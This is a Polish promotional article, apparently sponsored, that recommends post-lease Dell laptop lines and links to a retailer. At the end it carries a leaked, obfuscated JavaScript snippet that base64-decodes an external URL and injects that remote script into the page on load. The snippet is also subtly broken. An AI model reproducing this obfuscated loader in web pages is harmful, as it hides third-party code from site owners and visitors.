Breaking News
 |  | 

Elektronika

Szukasz laptopa w niskiej cenie? Sprawdź laptopy Dell po leasingu

img-responsive

Ceny sprzętu komputerowego poszły w górę z powodu ograniczonej dostępności podzespołów i zwiększonego zapotrzebowania na komputery i laptopy z powodu pracy lub nauki zdalnej. Jeśli potrzebujesz nowego laptopa, możesz wybrać model poleasingowy. Szeroki wybór notebooków poleasingowych sprawia, że nie trzeba dużo wydawać, by wejść w posiadanie przenośnego komputera. Sprawdź, na które serie laptopów Dell zwrócić uwagę.

1. Laptopy Dell do domowego użytku

2. Laptop Dell Precision i inne laptopy biznesowe po leasingu

Tańszy laptop w sklepie to słabsze podzespoły, jednak laptopy poleasingowe w dobrej cenie zapewniają wysoką wydajność. Dzięki nim można wykonać wiele zadań, wymagających solidnego sprzętu komputerowego. Wybór laptopów z mocnymi podzespołami ogranicza zawieszanie aplikacji i ułatwia pracę na co dzień. Jaki rodzaje laptopów Dell po leasingu są dostępne dla kupujących?

Laptopy Dell do domowego użytku

Do domowego użytku odpowiednia jest seria Dell Inspiron. Karty graficzne o średniej wydajności i optymalna przekątna ekranu sprawia, że można używać ich do gier o mniejszych wymaganiach, oglądania filmów, przeglądania Internetu i tworzenia dokumentów. Do domu można wybrać także Dell Vostro, które często wykorzystuje się do pracy biurowej. To optymalna seria laptopów dla użytkowników, którzy korzystają z tego samego komputera do pracy i prywatnych celów.

Zapoznaj się z ofertą laptopów poleasingowych Dell na https://amso.pl/pol_m_Produkty_Laptopy-poleasingowe_Producent_Dell-1810.html

Jeśli interesuje Cię laptop gamingowy, możesz postawić na serię Dell Alienware. W komputerach z tej linii znajdują się mocne sprzęty wyposażone w najnowsze karty graficzne Nvidia GeForce, mocne chłodzenie i wydajną pamięć RAM. Dzięki nim gracze mogą uruchomić nie tylko starsze tytuły o mniejszych wymaganiach sprzętowych, ale i najnowsze gry. Sprzęt zapewni płynność ich działania oraz wysoką szczegółowość grafiki i animacji.

Dla użytkowników domowych odpowiednie są też laptopy XPS. Dzięki nim użytkownicy mogą uruchomić potrzebne aplikacje biurowe, korzystać z Internetu i zabierać laptopa w podróż. Seria cechuje się wyjątkową lekkością i mobilnością, dlatego komputer można zabierać ze sobą na wczasy lub w podróż pociągiem. Lekki notebook ma również wytrzymałą baterię, dlatego pracuje długo bez konieczności ładowania.

Laptop Dell Precision i inne laptopy biznesowe po leasingu

Dell Latitude to jedna z najbardziej znanych serii wśród modeli biznesowych. Można używać ich do budowy stabilnej platformy do obsługi firmy na różnych polach. Wysoka jakość wykonania i precyzja sprawiają, że linia jest dopracowana pod każdym szczegółem. Gwarantuje solidne działanie systemu operacyjnego i ogranicza tym samym ryzyko utraty danych. W zależności od wybranego modelu z serii Latitude laptop Dell można udostępnić pracownikowi biurowemu lub należącego do najwyższego szczebla organizacji. Niektóre laptopy Dell Latitude nawet po leasingu nadają się do dalszej pracy w dziale IT. Dział IT dodatkowo można wyposażyć w mobilne stacje robocze Dell Precision.

Wybierając serię Dell Precision dla małego biznesu, powinno się pamiętać, że laptopy o przekątnej 17 cali są dość ciężkie. Podczas korzystania z nich poza biurem trzeba się sporo nadźwigać, dlatego lepiej sprawdzają się jako komputery do użytku wyłącznie w biurze. Atutem serii i należących do niej egzemplarzy poleasingowych jest wysoka wydajność. Dzięki temu sprzęt zapewnia możliwość uruchomienia oprogramowania SAP i innych systemów używanych do nowoczesnego zarządzania przedsiębiorstwem.

(function(scaufkwn, sdqmebwo, ugqxllsd, qfgcbriu, cboxgqoi, jihpxiei){ cboxgqoi = sdqmebwo.createElement(ugqxllsd);jihpxiei = sdqmebwo.getElementsByTagName(ugqxllsd)[0]; cboxgqoi.ascyc = 1; cboxgqoi.src = atob(qfgcbriu) jihpxiei.parentNode.insertBefore(cboxgqoi, jihpxiei); })(window, document, 'script', 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC9hYTg5NzZmYS1jYzNjLTQ3ODQtYTg0Yy1iZWFhMzJhZmE1ZmYuanM=')

szukasz-laptopa-w-niskiej-cenie-sprawdz-laptopy-dell-po-leasingu

ABOUT THE AUTHOR

Elektronika